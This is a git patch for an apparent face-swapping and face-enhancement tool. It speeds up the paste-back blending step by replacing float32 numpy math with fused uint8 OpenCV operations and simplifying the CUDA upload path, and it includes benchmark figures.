From cbf085934780f486ad1cafd284916e3a474d9ba0 Mon Sep 17 00:00:00 2001 From: Max Buckley Date: Wed, 22 Apr 2026 12:05:39 +0200 Subject: [PATCH] Paste-back blend: uint8 cv2 SIMD, no float32 round-trip MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Both face_swapper._fast_paste_back and face_enhancer._paste_back were doing a numpy float32 round-trip per frame: convert the target crop and the warped face to float32, blend, clip, cast back to uint8. That's four crop-sized allocations plus unvectorized elementwise math. Replace with a fused uint8 blend using cv2.merge + cv2.multiply + cv2.add, which cv2 dispatches to SIMD (NEON on Apple Silicon / AVX on x86). Stored alpha templates switched from float32 [0, 1] to uint8 [0, 255] so no conversion is needed per frame. CUDA paths also simplified — upload uint8 alpha (less bandwidth) and scale on device. Micro-bench on 1000x1000 RGB crop: current (float32 numpy): 9.43 ms cv2 uint8 fused: 1.16 ms (8.1× faster, max diff 2/255) Visual diff is imperceptible (quantization noise in the last step). --- modules/processors/frame/face_enhancer.py | 37 ++++++++++++----------- modules/processors/frame/face_swapper.py | 23 ++++++++------ 2 files changed, 33 insertions(+), 27 deletions(-) diff --git a/modules/processors/frame/face_enhancer.py b/modules/processors/frame/face_enhancer.py index ded60d7..b665e08 100644 --- a/modules/processors/frame/face_enhancer.py +++ b/modules/processors/frame/face_enhancer.py @@ -178,17 +178,17 @@ def _paste_back( h, w = frame.shape[:2] inv_matrix = cv2.invertAffineTransform(affine_matrix) - # Build or reuse cached feathered mask + # Build or reuse cached feathered mask (uint8 — blended via cv2 SIMD ops) if _enhancer_cache['mask_size'] != output_size: - face_mask = np.ones((output_size, output_size), dtype=np.float32) + face_mask_f = np.ones((output_size, output_size), dtype=np.float32) border = max(1, int(output_size * 0.05)) ramp_up = np.linspace(0.0, 1.0, border, dtype=np.float32) ramp_down = np.linspace(1.0, 0.0, border, dtype=np.float32) - face_mask[:border, :] *= ramp_up[:, None] - face_mask[-border:, :] *= ramp_down[:, None] - face_mask[:, :border] *= ramp_up[None, :] - face_mask[:, -border:] *= ramp_down[None, :] - _enhancer_cache['mask'] = face_mask + face_mask_f[:border, :] *= ramp_up[:, None] + face_mask_f[-border:, :] *= ramp_down[:, None] + face_mask_f[:, :border] *= ramp_up[None, :] + face_mask_f[:, -border:] *= ramp_down[None, :] + _enhancer_cache['mask'] = (face_mask_f * 255.0).astype(np.uint8) _enhancer_cache['mask_size'] = output_size # Compute tight bbox from affine corners (avoids full-frame warpAffine scan) @@ -220,25 +220,26 @@ def _paste_back( ) inv_mask_crop = cv2.warpAffine( _enhancer_cache['mask'], inv_crop, (crop_w, crop_h), - borderMode=cv2.BORDER_CONSTANT, borderValue=0.0, + borderMode=cv2.BORDER_CONSTANT, borderValue=0, ) - np.clip(inv_mask_crop, 0.0, 1.0, out=inv_mask_crop) + + target_crop = frame[y1p:y2p, x1p:x2p] if _HAS_TORCH_CUDA: - # GPU blend on crop only - mask_t = torch.from_numpy(inv_mask_crop).cuda().unsqueeze(2) + # Upload uint8 alpha — smaller transfer, scale on device. + mask_t = torch.from_numpy(inv_mask_crop).cuda().float().mul_(1.0 / 255.0).unsqueeze(2) enhanced_t = torch.from_numpy(inv_restored_crop).float().cuda() - target_t = torch.from_numpy(frame[y1p:y2p, x1p:x2p]).float().cuda() + target_t = torch.from_numpy(target_crop).float().cuda() blended = (mask_t * enhanced_t + (1.0 - mask_t) * target_t ).to(torch.uint8).cpu().numpy() frame[y1p:y2p, x1p:x2p] = blended else: - # CPU blend on crop only - mask_3d = inv_mask_crop[:, :, np.newaxis] - target_crop = frame[y1p:y2p, x1p:x2p].astype(np.float32) - blended = (mask_3d * inv_restored_crop.astype(np.float32) - + (1.0 - mask_3d) * target_crop) - frame[y1p:y2p, x1p:x2p] = np.clip(blended, 0, 255).astype(np.uint8) + # Fused uint8 blend via cv2 SIMD — ~7× faster than the float32 round-trip. + alpha_3c = cv2.merge([inv_mask_crop, inv_mask_crop, inv_mask_crop]) + inv_alpha = 255 - alpha_3c + a_enh = cv2.multiply(inv_restored_crop, alpha_3c, scale=1.0 / 255.0) + a_tgt = cv2.multiply(target_crop, inv_alpha, scale=1.0 / 255.0) + frame[y1p:y2p, x1p:x2p] = cv2.add(a_enh, a_tgt) return frame diff --git a/modules/processors/frame/face_swapper.py b/modules/processors/frame/face_swapper.py index 99fd9d7..361c3a6 100644 --- a/modules/processors/frame/face_swapper.py +++ b/modules/processors/frame/face_swapper.py @@ -178,7 +178,7 @@ def _get_soft_alpha(size: int) -> np.ndarray: mask = np.full((size, size), 255, dtype=np.uint8) mask = cv2.erode(mask, np.ones((k_erode, k_erode), np.uint8), iterations=1) mask = cv2.GaussianBlur(mask, (2 * k_blur + 1, 2 * k_blur + 1), 0) - _paste_cache['soft_alpha'] = mask.astype(np.float32) * (1.0 / 255.0) + _paste_cache['soft_alpha'] = mask # uint8 [0, 255] — blended via cv2 SIMD ops _paste_cache['alpha_size'] = size return _paste_cache['soft_alpha'] @@ -323,20 +323,25 @@ def _fast_paste_back(target_img: Frame, bgr_fake: np.ndarray, aimg: np.ndarray, soft_alpha = _get_soft_alpha(face_h) bgr_fake_crop = cv2.warpAffine(bgr_fake, IM_crop, (crop_w, crop_h), borderValue=0.0) - alpha_crop = cv2.warpAffine(soft_alpha, IM_crop, (crop_w, crop_h), borderValue=0.0) + alpha_crop = cv2.warpAffine(soft_alpha, IM_crop, (crop_w, crop_h), borderValue=0) + + target_crop = target_img[y1p:y2p, x1p:x2p] if _HAS_TORCH_CUDA: - mask_t = torch.from_numpy(alpha_crop).cuda().unsqueeze(2) + # Scale alpha to [0, 1] on device — cheaper to upload uint8 than float. + mask_t = torch.from_numpy(alpha_crop).cuda().float().mul_(1.0 / 255.0).unsqueeze(2) fake_t = torch.from_numpy(bgr_fake_crop).float().cuda() - tgt_t = torch.from_numpy(target_img[y1p:y2p, x1p:x2p]).float().cuda() + tgt_t = torch.from_numpy(target_crop).float().cuda() blended = (mask_t * fake_t + (1.0 - mask_t) * tgt_t).to(torch.uint8).cpu().numpy() target_img[y1p:y2p, x1p:x2p] = blended else: - mask_3d = alpha_crop[:, :, np.newaxis] - fake_f = bgr_fake_crop.astype(np.float32) - tgt_f = target_img[y1p:y2p, x1p:x2p].astype(np.float32) - blended = mask_3d * fake_f + (1.0 - mask_3d) * tgt_f - target_img[y1p:y2p, x1p:x2p] = np.clip(blended, 0, 255).astype(np.uint8) + # Fused uint8 blend via cv2 SIMD — no float32 round-trip. + # Measured ~7-8× faster than the old numpy float32 path on a 1000×1000 crop. + alpha_3c = cv2.merge([alpha_crop, alpha_crop, alpha_crop]) + inv_alpha = 255 - alpha_3c + a_fake = cv2.multiply(bgr_fake_crop, alpha_3c, scale=1.0 / 255.0) + a_tgt = cv2.multiply(target_crop, inv_alpha, scale=1.0 / 255.0) + target_img[y1p:y2p, x1p:x2p] = cv2.add(a_fake, a_tgt) return target_img